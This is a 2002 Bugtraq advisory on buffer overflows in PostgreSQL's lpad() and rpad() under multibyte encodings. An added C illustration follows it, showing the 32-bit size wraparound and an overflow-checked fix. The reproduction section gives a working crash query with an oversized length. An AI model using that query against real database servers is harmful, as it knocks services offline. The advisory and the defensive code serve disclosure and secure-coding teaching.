From: Sir Mordred The Traitor mordred@s-mail.com
Date: Tue Aug 20, 2002 08:01:34 AM US/Pacific
To: bugtraq@securityfocus.com
Subject: @(#)Mordred Labs advisory 0x0004: Multiple buffer overflows in PostgreSQL.
//@(#) Mordred Labs advisory 0x0004
Release date: 20/08/02
Name: Two buffer overflows in PostgreSQL
Versions affected: all versions
Conditions: multibyte support
Risk: average
--[ Description:
I guess all of you have already heard about PostgreSQL.
If not, try to visit
http://www.postgresql.org/idocs/index.php?preface.html#INTRO-WHATIS.
There are two buffer overflows in src/backend/utils/adt/oracle_compat.c.
1) lpad(text, integer, text) function
2) rpad(text, integer, text) function
--[ Details:
The code for these functions is in
src/backend/utils/adt/oracle_compat.c::lpad() and
src/backend/utils/adt/oracle_compat.c::rpad() respectively.
The code suffers from a buffer overflow (of course).
--[ How to reproduce:
shell> psql template1 postgres
template1=# select version();
version
-----------------------------------------------------------
PostgreSQL 7.2 on i686-pc-linux-gnu, compiled by GCC 2.96
(1 row)
template1=# create database my_db with encoding='UNICODE';
CREATE DATABASE
template1=# \c my_db
You are now connected to database my_db.
my_db=# select lpad('xxxxx',1431655765,'yyyyyyyyyyyyyyyy');
pqReadData() -- backend closed the channel unexpectedly.
This probably means the backend terminated abnormally
before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
!#
The same for rpad() function.
The vulnerable encodings are: EUC_JP, EUC_CN, EUC_KR, EUC_TW, UNICODE, MULE_INTERNAL.
--[ Solution:
Secure coding of web applications, input validation checks...etc...
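The advisory does not spell out why a length of 1431655765 kills the backend, and the example below is not PostgreSQL's code. It is an added illustration of the arithmetic hazard that a character count in a multibyte encoding creates: the requested number of characters has to be multiplied by a per-character byte width before a buffer can be sized, and if that product is computed in 32 bits it can wrap to a tiny value. With the advisory's own length and a width of 3 (an assumption; the advisory only says multibyte support is the condition), 1431655765 * 3 + 4 wraps to 3. The functions `naive_pad_bytes`, `checked_pad_bytes` and `lpad_checked`, the constants `HDR_SIZE` and `MAX_PAD_CHARS`, and the single-byte-only `lpad_checked` are all this example's own; they show the input validation the Solution section alludes to in the form of an overflow-checked size computation plus a policy cap.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bytes reserved in front of the padded text for a length header
 * (assumption: stands in for a varlena-style header; the advisory does
 * not name the real constant or its width). */
#define HDR_SIZE 4u

/* Policy cap on how many characters a padded result may contain
 * (assumption: a value chosen for this example, not PostgreSQL's). */
#define MAX_PAD_CHARS (64u * 1024u * 1024u)

/* The arithmetic that goes wrong when done in 32 bits: a character
 * count times the per-character byte width of a multibyte encoding.
 * Done in uint32_t so the wraparound is well-defined here; in a signed
 * int the same overflow would be undefined behaviour. */
uint32_t naive_pad_bytes(uint32_t nchars, uint32_t width)
{
    return nchars * width + HDR_SIZE;   /* silently wraps on overflow */
}

/* Overflow-checked version for a 32-bit size field.  Returns 1 and
 * stores the byte count on success, 0 if nchars is negative, width is
 * implausible, or nchars * width + HDR_SIZE would not fit in 32 bits. */
int checked_pad_bytes(long long nchars, uint32_t width, uint32_t *out)
{
    if (nchars < 0 || width == 0 || width > 4)
        return 0;
    if ((unsigned long long)nchars > (UINT32_MAX - HDR_SIZE) / width)
        return 0;                       /* product would overflow */
    *out = (uint32_t)nchars * width + HDR_SIZE;
    return 1;
}

/* Left-pad `s` with `fill` to `nchars` characters.  Single-byte text
 * only, so width is 1 (multibyte handling is omitted to keep the
 * example short).  Returns a malloc'd NUL-terminated string, or NULL
 * when the request is rejected by the cap or the overflow check.  As
 * with the SQL function, input longer than nchars is truncated. */
char *lpad_checked(const char *s, long long nchars, const char *fill)
{
    uint32_t bytes;
    size_t slen, flen, padlen, i;
    char *r;

    if (nchars > (long long)MAX_PAD_CHARS ||
        !checked_pad_bytes(nchars, 1u, &bytes))
        return NULL;
    flen = strlen(fill);
    if (flen == 0)
        return NULL;                    /* nothing to pad with */
    slen = strlen(s);
    if (slen > (size_t)nchars)
        slen = (size_t)nchars;          /* truncate to nchars */
    padlen = (size_t)nchars - slen;

    /* bytes == nchars + HDR_SIZE, so it also covers the terminator. */
    r = malloc(bytes);
    if (r == NULL)
        return NULL;
    for (i = 0; i < padlen; i++)
        r[i] = fill[i % flen];          /* repeat the fill pattern */
    memcpy(r + padlen, s, slen);
    r[(size_t)nchars] = '\0';
    return r;
}

int main(void)
{
    uint32_t n = 0;
    char *p;

    /* The advisory's length with a 3-byte width wraps to 3 bytes. */
    printf("naive size:   %u\n", naive_pad_bytes(1431655765u, 3u));
    printf("checked size: %d (0 = rejected)\n",
           checked_pad_bytes(1431655765LL, 3u, &n));

    p = lpad_checked("xxxxx", 10, "y");
    printf("lpad: %s\n", p ? p : "(rejected)");
    free(p);
    p = lpad_checked("xxxxx", 1431655765LL, "y");
    printf("lpad: %s\n", p ? p : "(rejected)");
    free(p);
    return 0;
}
```

The cap alone would stop the advisory's value, but `checked_pad_bytes` is kept separate so the overflow invariant is enforced even where a caller chooses a larger policy limit; the boundary case 1431655763 * 3 + 4 still fits and is accepted, while one more character is refused.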